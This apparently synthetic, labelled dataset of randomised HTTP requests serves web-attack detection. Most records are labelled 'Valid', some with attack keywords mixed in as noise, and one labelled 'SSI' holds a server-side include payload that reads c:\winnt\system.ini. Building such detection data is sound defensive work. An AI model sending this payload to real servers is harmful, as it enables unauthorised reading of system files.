Cookie2: $Version="7"
Date: Mon, 15 Feb 10 07:34:32 CET
ETag: W/"pbjVzqemGJN.290ZUYvt"
Expect: 100-continue
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Thu, 28 Oct 04 16:14:39 CET
If-Unmodified-Since: Tue, 07 Nov 06 03:57:23 CET
If-Match: "u0m@qrPn4@Mtf@KRCl"
If-None-Match: "vJSUUNrcMV9UkX9NX"
If-Range: Wed, 22 Feb 06 16:48:39 CET
Max-Forwards: 41
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM YWxlQWN1ZGJ6ZG5iZXJheXRodFJidXBlRXc2N2NibXBodHVLNWVqb0g=
Authorization: Basic SWVuN2RuOjNoeWFtZXNl
Range: 209-45720
Referer: http://www.rue3tc.org/xheuia/pnyit9o/iEtfGrn/axlce/a2ts.gif
TE: gzip;q=0.7,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/7.5 (Machintosh; U; PPC 8.8; Em-nr; rv:6.9.8) Gecko/59719207
UA-CPU: MIPS
UA-Disp: 491,839,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 480x167
Via: 7.8 www.aaeEbot2.html, 5.4 35.226.218.10, FTP/8.6 www.ehayCru6.html
Transfer-Encoding: compress
Upgrade: hrsloe/4.3
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 62.26.34.68
X-Serial-Number: 4179007460908292246
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47998
Start - Id: 7997
class: Valid
POST /mmifelwyweeteMz/z-v/prahteoeetsdqu.png? HTTP/1.0
Content-Length: 135
Content-Language: dlMai,atoerp,hreflse
Content-Encoding: compress
Content-Location: /etsfne.html
Content-MD5: c2Fzc2ZnZXdtdDlrYmYzbA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 04 Aug 07 07:18:08 CET
Last-Modified: Sun, 05 Oct 08 20:10:10 CET
Host: 247.224.69.27
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: compress, compress;q=0.1, identity;q=0.8
Accept-Language: *;q=0.5
Cache-Control: max-age=4
Client-ip: 65.187.17.2
Cookie: iuSnSsHmu=7926;hjNspe4hte=4SS
Cookie2: $Version="792"
Date: Mon, 19 Dec 05 16:16:08 CET
ETag: "Uor8lt.MJfvmU1Tkr"
Expect: tptnoo
From: Scez@aoailhel.gov
If-Modified-Since: Mon, 26 Mar 07 14:13:41 CET
If-Unmodified-Since: Wed, 29 Apr 09 08:23:40 UTC
If-Match: "oq_1pCLZQrw3EM4Lv"
If-None-Match: "XlYeahgjFJU5Ywo4"
If-Range: *
Max-Forwards: 9
Pragma: aemwtigu=ttequ1
Proxy-Authorization: Fs9vs 82ivtD=qasoo
Authorization: NTLM cnN1cmNyc3dzaG1hdGlsaFUyeHNlT0VuZW5ldGVhWXdPZWh0aTBvVndmNTJvYQ==
Range: 439-82,94-,67-
Referer: http://www.moosy.fr/mr9hh/8Rea.asmx
TE: trailers,deflate;q=0.0,trailers
Trailer: Upgrade
User-Agent: rw0llt/3.7.9.4
UA-CPU: PowerPC
UA-Disp: 6556,373,32
UA-OS: Linux
UA-Color: color16
Via: FTP/6.6 www.afmsvT.jpeg
Transfer-Encoding: gzip
Upgrade: htayae/6.0, UnlPs4/9.9, Xiii/1.1, rali/4.0, keeywl/8.8
Warning: 154 125.176.164.225 "ewee" "Fri, 01 May 09 05:36:13 GMT"
X-Serial-Number: 6980972846
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

h4lunqah=3422358&cepnnhleltc7=6897&hgbnetbis=9215619&cave=02465&uijcyosaq=?nulu&bgttGaccept= opmocha/nsl?]eosoziscript-r5&oi=20

End - Id: 7997
Start - Id: 19350
class: Valid
GET /nL6vOrAZcnT/oeStadgichaa/vhvyPC/au0Btqaj/ntpn8ssoa/eR9un_0.jpeg?rnttsaoa6=e%40tt&ohrge4d=140&hi2oaeelwipr=8&dnegawem6a5ssop=ets%28%3AdmzdaoatYem&u9oesiyednEn=l41HkjFf2-&dltpenhepafswa=opr&y3=35613&ai43nuum3cri9=c3hovzeh&CqcnimgL6=sweSfS%255iao&inh=eOWHoRQ&dvOhmn=oacT&vbgces=0&rs2pdst=87963457&wtEoeaEVgt=%3Clikeeoyl&qenhoy0=yrm HTTP/1.0
Host: www.4tun3.uk
Connection: ia9a
Accept: audio/x-wav
Accept-Charset: *;q=0.2
Accept-Encoding: gzip;q=0.1, gzip, deflate;q=0.9, identity;q=0.1
Accept-Language: ueky9omi-td8asre, qn2murtt-sWiei, to2-y8hhrigw, x-bosF;q=0.3, icr-cr2l
Cache-Control: max-age=92066
Client-ip: 210.226.84.255
Cookie: Rieylohsu4i=6907;ce4hwuhinpEtkZ=02309;8hrzit=nkjHEZHZk;lanRev=EProO80
Cookie2: $Version="84"
Date: Thu, 03 Sep 09 10:38:07 CET
ETag: W/"7Sx2WhrqLQQ@nr1t"
Expect: Rama
From: q8nm@dnhqn.uk
If-Modified-Since: Thu, 29 Nov 07 08:19:42 CET
If-Unmodified-Since: Tue, 11 Mar 08 18:17:22 CET
If-Match: "J.TNvWg_aoibWV@"
If-None-Match: "U5sGFzOb-gf9.DB58eAs"
If-Range: Sun, 06 Aug 06 11:21:32 UTC
Max-Forwards: 502
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Basic bmZydGM6ZGVlYQ==
Authorization: Basic aG5pc2VTMzpsMW4wMHM=
Range: 211-,8-320282,8586-
Referer: /0idrpm/jwetoill/kitebdny/67rv/ostoon.nsf
TE: trailers
Trailer: If-Match
User-Agent: gtu44H/2.4.4.8
UA-CPU: StrongARM
UA-Disp: 3725,4238,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 352x2255
Via: dhhsps/6.3 www.eeeid.tiff, 6.7 www.lR4btrk.html
Transfer-Encoding: gzip
Upgrade: aTrdtn/5.5, drrU/7.9, dWr/1.4
Warning: 825 www.3Eothdos.gif:29220 "iow9t" 
X-Forwarded-For: 106.216.193.253
X-Serial-Number: 0947873125180577061
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19350
Start - Id: 30621
class: Valid
GET /etcyoeFimg./as1GRjg0a/abvehtoprc1rmrelra6/e64ELak5E/ar.msf?KrZQ5pCUJ=391245888&ehtkrOh=oa&bmtast=et3kFMA-CE&IZQcopyUSxml=R&ohth5dtj=naihF+g%2Fqoo+m%28&erLuwyros=7&eysNbu=3&qnreeljd=ttuo2&irtfrr=34&e6t9oh3i=986533205&s1snuab=014 HTTP/1.1
Host: 14.149.26.119:04210
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 129.82.35.213
Cookie: tu-3LrXpasswdWFiR=(a;jzd4ot=lErOe7eap;aeze=31;e5Her=87438893
Cookie2: $Version="85"
Date: Fri, 14 Oct 05 16:50:29 GMT
ETag: W/"L6Mud51U0iCSY8tmJr"
Expect: 100-continue
From: ewemen@Ld96ee.de
If-Modified-Since: Thu, 23 Sep 04 03:40:30 GMT
If-Unmodified-Since: Wed, 15 Apr 09 18:11:46 UTC
If-Match: "aLOGOrc_UBhFU@NjQst"
If-None-Match: *
If-Range: "GTZH..j1P0WmYte"
Max-Forwards: 9505
MIME-Version: 5.5
Pragma: knn=heisus
Proxy-Authorization: tgfge aunbuc=stss
Authorization: Digest opaque="M6natd"
Range: -44,-9596,885-03597
Referer: http://einue.fr/h6swr.jsp
TE: trailers
Trailer: Accept-Charset
User-Agent: tneeecitu (ozcYw.; edEluz; cOs892a; ozwgF3d)
UA-CPU: StrongARM
UA-Disp: 436,0901,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 9301x810
Via: 1.9 www.xrnt.png, FTP/9.4 www.hehlg.png, 4.6 200.131.140.148
Transfer-Encoding: compress
Upgrade: 0gtw/9.1, Wtkt/5.8, Hes6g/7.6, RE4ntd/6.1
Warning: 055 www.eenm1.shtml "niJnlgnspnleuaov" 
X-Forwarded-For: 147.151.22.151
X-Serial-Number: 79914989141850023
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30621
Start - Id: 7626
class: Valid
POST /uumr08yche7OStaOn8rp/sqf5c8VRuU_/gafia2M/bbkmBnetcat/bg7Ti3kbp7bTJPHqk/aEKl3ZUa0FQYzSI/u83I8/ri0lhcedyhepdd.tiff? HTTP/1.0
Content-Length: 120
Content-Language: ixe
Content-Encoding: gzip
Content-Location: http://www.taeeorr4.uk/ynhWsIlL/doDtnEre/unoT3.exe
Content-MD5: bG1ldzNvZU5vd3FrZWQzNg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 15 Mar 05 05:53:15 UTC
Last-Modified: Thu, 17 Mar 05 05:58:21 UTC
Host: 111.226.246.21:80
Connection: UUrla
Accept: video/*, audio/*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: ps-r, Ennr-mtn, nni0c-myd;q=0.6, aZreA-m;q=0.6
Cache-Control: max-stale=10
Client-ip: 136.161.142.168
Cookie: itz=lCrcz ;ts2he;etueaxhRIup=7awaK0
Cookie2: $Version="577"
Date: Fri, 03 Jun 05 10:41:22 UTC
ETag: "qi2unb4DKTAP9F9lw"
Expect: Ak8yU=inrte;sean2ch=ymte85R
From: Uam4ikh@nCececii2a.uk
If-Modified-Since: Fri, 06 Feb 04 02:07:12 CET
If-Unmodified-Since: Sun, 03 Aug 08 07:26:09 CET
If-Match: "I1DjNF.l8fD@T.EDiE6S"
If-None-Match: *
If-Range: "Es1D0sQ.ff5uobNI8"
Max-Forwards: 45
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Basic UzluZWhtbjp0dWxnbg==
Authorization: Basic dGkzbmRjZzp0dGxxaXVyZw==
Range: 70517-,7-,66190-
Referer: http://lftO8n.cz/etxsc.conf
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/5.7 (Windows; U; Windows NT 3.5; Se-sr; rv:7.0.1) Gecko/10389948
UA-CPU: 68000
UA-OS: Windows NT
UA-Color: color32
Via: 7.7 71.50.109.141:4, HTTP/5.8 www.61h0.tiff
Transfer-Encoding: identity
Upgrade: yyr85/0.6, mnLmta/7.1, sedrw/1.7, wRp3/3.2, ebe/4.8
Warning: 763 www.tBeic.jpeg "daariegtelcya7h" "Tue, 12 Oct 04 10:28:02 CET"
X-Forwarded-For: 223.150.236.173
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

est5sjhfSn=ntn>t&z932htehu=w&e1srcp&bshQaAaf151vm5a=iadt+ohdo&VZM9passwdbetweenbLB=inlec4Iaxse&iceuSmeerpljqco=223

End - Id: 7626
Start - Id: 1742
class: Valid
GET /jem/evueeuO3obsrisowsmiE/dgDuSorenoHasIs/sQT/dU9VO2QN/e_pHWpiMx4dQc3s0P.shtml?sx9ptis=8504&qdcmI4tsaLizu=62152927&l1i8Anfrcliiltn=pe&lche=wM9xanoads2reFp5q&nrCm51eftb0e=%7Etmoors%3EgspB&jzclesitq=87745730&MnSRhl4stwswri=3tihn&gGluts=nssuzlqnzd9d+cmdt&BQ5i9gDgxmlt=199&Et=iovNqt0&3allAySNm7Pscript=iizA HTTP/1.1
Host: 144.224.142.135
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: windows-1250;q=0.8, iso-8859-5, x-mac-ce
Accept-Encoding: deflate, gzip
Accept-Language: n-lnsAd;q=0.3, Uiinnewm-Ah, 8nheAttm-o
Cache-Control: only-if-cached
Cookie: osemh=n4h;kIoBbT@4=0u;hn29sdsca=8;7NabinRgmBN9W=5637;Rn=78;et=433213407
Cookie2: $Version="5"
Date: Tue, 22 May 07 07:03:32 GMT
ETag: W/"ZRI8DkbQN_R0PXnw_.f"
Expect: duheru=ntsaap
From: enale@Uditp1t.net
If-Modified-Since: Wed, 09 Jan 08 21:55:50 CET
If-Unmodified-Since: Sun, 24 Jul 05 07:52:31 GMT
If-Match: "0E6ngB4GP6P5htk"
If-None-Match: "4yqZEL6-_9kLHjJhPM"
If-Range: Fri, 12 May 06 23:02:45 CET
Max-Forwards: 9
MIME-Version: 4.6
Authorization: Basic c2xkeXlvdDpld3h0ZThubg==
Referer: http://rhaieu.biz/xhn7ey/Turtl.mpeg
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.9 (Machintosh; U; PPC 4.4; re-ga; rv:2.9.7) Gecko/90418120
Via: FTP/2.3 www.Rpmre.css
Transfer-Encoding: gzip
Warning: 665 www.ro7ndPBE.shtml "hwovsoawLo2rSjo5o1" "Mon, 24 Jul 06 19:41:19 GMT"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1742
Start - Id: 12791
class: Valid
GET /xDt0q-B.jsp?G-FJWk_tkGall=nhhnamce8&eCeyldhonH0Vh=naeijshbilaEea&nt0c3=8-eX&gaecD=tdteT&MTpPvnodeXD=tsiirs+&tcean0ifehiedaU=sscripteort&1nj=rQCqEgQtB&t9oh2wvlsmuthea=115&e6taWtmswc=4153471 HTTP/1.0
Host: 48.218.235.46
Connection: keep-alive
Accept: text/html;q=0.2, video/quicktime, application/zip;q=0.0
Accept-Charset: x-mac-hebrew;q=0.0, windows-1250;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 152.134.10.228
Cookie: hc1rlAc68o4e=550wHw__pUWg
Cookie2: $Version="56"
Date: Mon, 30 Jun 08 19:28:24 GMT
ETag: "mropXh@_ajA7wC5"
Expect: 100-continue
From: eoulnSg@Edlnra.gov
If-Modified-Since: Thu, 29 Mar 07 12:59:22 UTC
If-Unmodified-Since: Fri, 10 Sep 04 10:36:30 GMT
If-Match: *
If-None-Match: "r9QlmiZZixGO@ga2"
If-Range: Wed, 13 Dec 06 07:49:25 UTC
Max-Forwards: 191
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Digest nc=FbFC07b3
Authorization: Digest uri=/Drsta.dll
Range: 880687-,10-
Referer: /eycke/rsc0h45/IKe3/3Ksae.mdb
TE: trailers
Trailer: Accept-Charset
User-Agent: ehdDri5Ric
UA-CPU: MIPS
UA-Disp: 718,169,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 3357x7611
Via: 4.1 www.dBymlA.css, plco/7.0 180.159.79.194:51
Transfer-Encoding: stao; 0ieus9m=l9a7e
Upgrade: DoR/2.1, rahogo/2.6
Warning: 738 www.mdRbith.jpeg "5erngdnraionsLeaa6n" 
X-Forwarded-For: 192.196.28.56
X-Serial-Number: 3346071128
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12791
Start - Id: 5505
class: Valid
PUT /jY/libo16m53LDdiv/esqrlfdanypDeagAkmEs/e4hoe/2tihpeducatrtmtc4/aa.htm? HTTP/1.0
Content-Length: 14
Content-Language: ee,suEfx
Content-Encoding: identity
Content-Location: /vtftHa8s/orql.rar
Content-MD5: Q2l0cnVUbWJudWNlMkFlZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Jan 09 09:03:04 CET
Last-Modified: Mon, 13 Aug 07 17:48:24 GMT
Host: 46.38.31.91
Connection: xsyoqd
Accept: video/mpeg;q=0.6
Accept-Charset: windows-1257
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-stale=98810
Client-ip: 158.89.14.102
Cookie: mfn=n/wgete0anctcis1 icTaz>e
Cookie2: $Version="42"
Date: Mon, 29 May 06 08:33:53 GMT
ETag: W/"ClRNYgOpJa7vxzd"
Expect: 100-continue
From: 5dsrcsa@9ag1.it
If-Modified-Since: Sun, 21 Mar 04 10:46:35 UTC
If-Unmodified-Since: Fri, 10 Aug 07 17:00:03 UTC
If-Match: *
If-None-Match: "A1l.GE1y3g7oBNNNfc"
If-Range: Thu, 27 Oct 05 09:21:19 UTC
Max-Forwards: 01
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic RXR3d2dpd3c6dzZnZXB4ag==
Authorization: Basic cmFzY2VuRDpIZW81ZXRlSQ==
Range: 4-,7992-3492,625-
Referer: http://www.sqsiu.fr/Taa3u8O/enpezu/peg3api/tfNnxuw.php
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/3.7 (Windows; U; Win 9x 0.4; ni-yt; rv:4.6.7) Gecko/22290867
UA-CPU: 68000
UA-Disp: 295,212,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 582x630
Via: rocere/8.7 www.whmb0.css, HTTP/4.9 www.eeaAop.htm
Transfer-Encoding: compress
Upgrade: ttd44a/8.9, eme6te/3.4, sge/5.8, 8mn/0.6
Warning: 321 www.hrctezid.js "o2Tbr6utate" 
X-Forwarded-For: 16.29.207.187
X-Serial-Number: 926841
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2h0Rtcin=5co n

End - Id: 5505
Start - Id: 19596
class: Valid
GET /QN0WBknetcat@oy3yH/hofeiotiztghEygxxelt/Oaa/Jw/Scutategam/e54gbEh9M4a32V68Rv.msf? HTTP/1.0
Host: 142.53.147.35
Connection: close
Accept: */*
Accept-Charset: cp-936;q=0.5, isiri-3342;q=0.5, x-mac-turkish, iso-8859-4, iso-8859-8;q=0.8
Accept-Encoding: gzip
Accept-Language: *;q=0.2
Cache-Control: max-stale=5
Client-ip: 171.16.125.52
Cookie: iobad=3183;svdRAneeef=tmte
Cookie2: $Version="175"
Date: Thu, 19 Feb 04 05:41:17 CET
ETag: "vfEVZCt5Z5rkHvk@rL5s"
Expect: eoWe4naa
From: e7lprv@rEhh.org
If-Modified-Since: Tue, 10 Nov 09 24:14:47 GMT
If-Unmodified-Since: Mon, 02 Oct 06 09:54:00 CET
If-Match: "ExvVOcrREw.uw5.IK.U"
If-None-Match: "xB6m2DJfl3VcYn@JBt"
If-Range: "oN7qm0OeiS4-EKei"
Max-Forwards: 88
MIME-Version: 1.6
Pragma: euA='sAlOnc'
Proxy-Authorization: hnwc eonohrme=eToyi
Authorization: Basic ZHN0aDpkYWV2YWE=
Range: -4,298-
Referer: http://9hionet.st/ng4d/yhhlscie/aAhab7/tsoarl0a/8opaIeiw.wav
TE: deflate,trailers,trailers
Trailer: Upgrade
User-Agent: shIpeb
UA-CPU: PowerPC
UA-Disp: 059,310,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 4605x2042
Via: 7.8 www.tjutjat.css, HTTP/0.5 121.3.205.22, vedmhc/1.4 www.RhrLouk5.png
Transfer-Encoding: gzip
Upgrade: njAt0/0.0, ehg0/5.1, lmi9wa/7.4, n7er/7.6, v9hit0/6.8
Warning: 605 www.dnne.shtml "oI3esi8tekNt" 
X-Forwarded-For: 240.111.161.144
X-Serial-Number: 1701611
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19596
Start - Id: 34539
class: Valid
PUT /hXXPMf4/urdlno2du/eExAT/IinQCaklocationdR2ENs/putnwEhwnautht.htm? HTTP/1.0
Content-Length: 25
Content-Language: a,Btqfnfno,hhnp
Content-Encoding: compress
Content-Location: /edbos/IdEael/sdyq.mspx
Content-MD5: aGFsa2VpdGhuZmVpbm5BdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Feb 05 05:34:04 GMT
Last-Modified: Sat, 14 Apr 07 01:23:22 GMT
Host: www.rOarn.com
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: oH9c=o
Client-ip: 217.109.107.241
Cookie: sO4Tre=6l+i'winnt;lwevgn2d=itl84ofeoe9bNiihhU;uwO18jhtaccesV=3ten;sclv=a;f0etfdoew4Soo=&/
Cookie2: $Version="195"
Date: Sat, 27 Jun 09 16:39:45 UTC
ETag: "mRjdLgMUo4W-ym0RUck"
Expect: ehcptate
From: aiiTbdt@stretps.it
If-Modified-Since: Thu, 04 Feb 10 20:58:28 UTC
If-Unmodified-Since: Thu, 06 May 04 09:28:15 UTC
If-Match: "x._oXgjjiP@Y0FeE"
If-None-Match: "cRYVsJC9Sg.@fnf06Nf"
If-Range: Sat, 14 Feb 09 03:35:50 UTC
Max-Forwards: 09
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM bGNobmljaGtpdFJ4a0tDY2hsbmxGaHI1dG15ZWVjbm9hdHNjbw==
Authorization: Digest cnonce="eaoj"
Range: 700959-,22-,44069-
Referer: /ensyxsR/LncNcxo/6wb1.js
TE: chunked;q=0.9
Trailer: Via
User-Agent: mnahmhrp
UA-CPU: MIPS
UA-Disp: 245,2195,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 066x785
Via: 2.7 www.oz5ana.jpeg, FTP/1.5 www.9iti.png:749
Transfer-Encoding: deflate
Upgrade: kRoot/8.0, ash/7.6, qah/9.5, stwee/0.8
Warning: 065 65.77.102.167 "nhro5a2" 
X-Forwarded-For: 38.219.193.159
X-Serial-Number: 52771929
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~

tIDogldhdbp=tw6sc0aEchrly

End - Id: 34539
Start - Id: 13176
class: Valid
GET /ezUWnJD/aapel2esro/sIrSeD5olVkmA3oGJ8/cfOgsq51x/zN3-r.htm?C9xibXdelete0YJvM=iIihcg%28co%27 HTTP/1.0
Host: 59.253.213.167:80
Connection: keep-alive
Accept: video/*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 34.236.250.61
Cookie: nAtEraseb=8te e;aos6leed=403997;uRCexecE=[lbsdoo3og<q;vei4oosuo=a-Zcyj6GAr;astotnoiucxbfCe=h;UtlhttpZLGjtCZ=rnSbo7iqu
Cookie2: $Version="095"
Date: Sat, 02 Feb 08 02:44:22 CET
ETag: "n9tR8-lMN_crbqnE"
Expect: rf7Aybh
From: eswp2a@SmynxY.com
If-Modified-Since: Thu, 11 Mar 04 14:26:30 UTC
If-Unmodified-Since: Sun, 17 Oct 04 07:55:09 GMT
If-Match: "E3wmCZ6-vgXawZY4K2gR"
If-None-Match: "ASnTNsDw38eZAB4_F2"
If-Range: Tue, 20 Mar 07 13:49:12 GMT
Max-Forwards: 228
MIME-Version: 6.3
Pragma: 2yy='yja'
Proxy-Authorization: Basic Zm5vdWE6b3R4dHM=
Authorization: NTLM a2Q0c3I0ZVVvZW5tZ0VvcWFyaWluc2RzdW8xdHdlbmg2
Range: 43542-753,-325241
Referer: http://nMngos.fr/aodinfe/er6e6/Ut0eelrt/ohst/tyenli.jsp
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/0.5 (Machintosh; U; PPC 0.9; Sh-uY; rv:8.1.2) Gecko/05428900
UA-CPU: Sparc
UA-Disp: 6672,699,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6456x555
Via: HTTP/1.0 41.73.187.156
Transfer-Encoding: Clvr; eOtse=hrobroeU
Upgrade: r7hret/3.9, mve/5.9, oiIbha/2.2, anpn/6.2, voe9h/2.5
Warning: 436 25.55.85.96:66207 "soslqahqAn" "Wed, 16 Jul 08 09:59:35 GMT"
X-Forwarded-For: 250.149.217.157
X-Serial-Number: 2288271
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 13176
Start - Id: 32892
class: Valid
POST /Dg0igIOIZF/e7_LcXHSP3QOHP1O/t1eQTN/ate4nnewe0bO/cSk8qyBXOo3x5QnbA.cgi? HTTP/1.1
Content-Length: 267
Content-Language: gtmpp,a,vZa
Content-Encoding: identity
Content-Location: http://uOeevn.fr/RtosR/ena5s1An/noseenr/e47wb/2geer.msf
Content-MD5: NHduMExvaWdGcGl0aGVndA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 09 Dec 05 03:05:42 CET
Last-Modified: Thu, 21 Aug 08 18:49:30 UTC
Host: 119.236.215.105
Connection: W2lsk
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 223.203.207.16
Cookie: beasb4letpnerii=pseq
Cookie2: $Version="049"
Date: Thu, 24 Dec 09 11:19:34 CET
ETag: "88Q4BQAglvBW0JGF80Q"
Expect: pnte
From: heae@rytmtosHp.biz
If-Modified-Since: Mon, 29 May 06 01:21:08 GMT
If-Unmodified-Since: Sun, 01 Jun 08 20:24:26 UTC
If-Match: "0fY1BwOyq1NBFZO1vS"
If-None-Match: *
If-Range: Wed, 15 Jun 05 11:47:20 GMT
Max-Forwards: 9
MIME-Version: 4.5
Pragma: gm='nhr'
Proxy-Authorization: 9TozsW ia2ust=fortes
Authorization: NTLM ZTZpMHJldG1yYXBRYVJodmhzOWFzQXJjbm9nYm5hd3NybmV2UnR0Z2V6b2lzaw==
Range: -11
Referer: /n3ksl/or4s.mdb
TE: trailers,gzip,gzip;q=0.7
Trailer: If-Match
User-Agent: 5oocw5 (wEuWZtT4Ee; u0AYMeFUx; oOS@vcGT7; nWbv7eBiZ)
UA-CPU: MIPS
UA-Disp: 523,5412,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 294x4012
Via: FTP/8.3 4.32.19.4, 8.8 20.165.37.110, 1.0 0.136.30.122
Transfer-Encoding: thotsl; edhti=ytw2tst
Upgrade: nttueo/5.8, iHertn/7.7, edu/1.0
Warning: 033 141.231.242.145 "t2po3soltutrrfuxesh" "Fri, 15 May 09 15:44:54 CET"
X-Forwarded-For: 96.92.231.105
X-Serial-Number: 45551258621
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tl=114573555&nx=l&hWHhE4SB=e bgsoundca5ri6S&wfcih8tn=91&wdro=usc<&wigr9nljateeo=ejausr133iauOeo0&jdi=t&hkteircu7Nf2io3=9547&72oeAlpYhgl=agSnT&odTotfsltilhher=w4je@r;p&sm=obodybhomeluta\yDn&cen1aax=mytt&fshdjuNg=2293805&eisWc4I=a8ceval &p_MPLsformDVdAT=8175311

End - Id: 32892
Start - Id: 40424
class: SSI
PUT /e-Ni.n/nvI4Zv/e72uJ_SJ/tzdlaHawrct7esyhR/oNecOVSd/7FLfVEbBRacceptG/i-Jvt/ihuswOfesnx/nF55nvEpaZGO4_US/SW/Sem/Erei.png? HTTP/1.0
Content-Length: 90
Content-Language: rophRc,plTichxh
Content-Encoding: deflate
Content-Location: /hann.jpeg
Content-MD5: aTVhdFNsSG40b2V0a3RoYg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Nov 07 05:03:36 GMT
Last-Modified: Thu, 17 Feb 05 21:45:42 CET
Host: 88.4.80.176
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: euc-jp, iso-8859-1;q=0.0, windows-1252, x-mac-ce
Accept-Encoding: gzip;q=0.1
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 58.132.221.105
Cookie: HdocumentBWktVqmX2c=T~MeremErwlclog;imhub3e5ojKe=5orcid7;mdklypa=0lWc1H@a3;Cleaynte=8stez;ntrElVj6tfs=922990077
Cookie2: $Version="70"
Date: Sun, 02 Nov 08 19:15:27 GMT
ETag: W/"ArG8AqvI0qTySIItp3u_"
Expect: 100-continue
From: rQkb4al@ootSiafmsu.cz
If-Modified-Since: Thu, 23 Aug 07 14:10:07 CET
If-Unmodified-Since: Mon, 28 Aug 06 02:52:15 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 5.8
Pragma: nn9=t6rl0reu
Proxy-Authorization: datl 7ziWgict=Jnpued
Authorization: Basic dDlkdDpyaUVzZUNWbw==
Range: 11-84,2848-,953675-
Referer: http://sonr.org/Udrarsan/moAhje/ptydeta/4vcdeiT/8i3o6.exe
TE: trailers,gzip;q=0.3,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/9.1 (X11; U; Open BSD i586 2.9; Rg-o1; rv:9.8.8) Gecko/57478187
UA-CPU: 68000
UA-Disp: 8347,1094,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 132x4219
Via: 0.3 158.158.244.222
Transfer-Encoding: compress
Upgrade: ufb/8.5, d45i3/7.9
Warning: 529 www.od0axrnr.html:377 "crrssos" 
X-Forwarded-For: 55.196.49.158
X-Serial-Number: 752812254452033186
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~

eyrwi5utfderhnp=<!-- #include    virtual="c:\winnt\system.ini"     -->

End - Id: 40424
Start - Id: 19391
class: Valid
GET /BcopydfnxsUDPxYND@/ssdhItndeestortghllt/lQ/ekUjYwClqmS0x@KHyOd.htm?c8=tnhDesu&arzrba=hwrYbthgeiil8&wgetXQggD=kcNnoa HTTP/1.0
Host: 68.167.205.87
Connection: Rmgi
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.5
Accept-Language: h-d, ngicpxE-e
Cache-Control: no-cache
Client-ip: 210.24.4.252
Cookie: nizi=401523;eiona2=17678733;CH8r=a7TFMAwK;sk=gFgM79hM
Cookie2: $Version="986"
Date: Fri, 19 Aug 05 20:25:17 CET
ETag: "qdS-CbZjhJjqpjwv1kiK"
Expect: Ntdnrtn
From: hxnatei@dLeolra.de
If-Modified-Since: Wed, 26 Jan 05 21:34:05 GMT
If-Unmodified-Since: Tue, 02 Mar 04 18:20:12 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 30 May 08 24:32:11 GMT
Max-Forwards: 4526
MIME-Version: 4.9
Pragma: no-cache
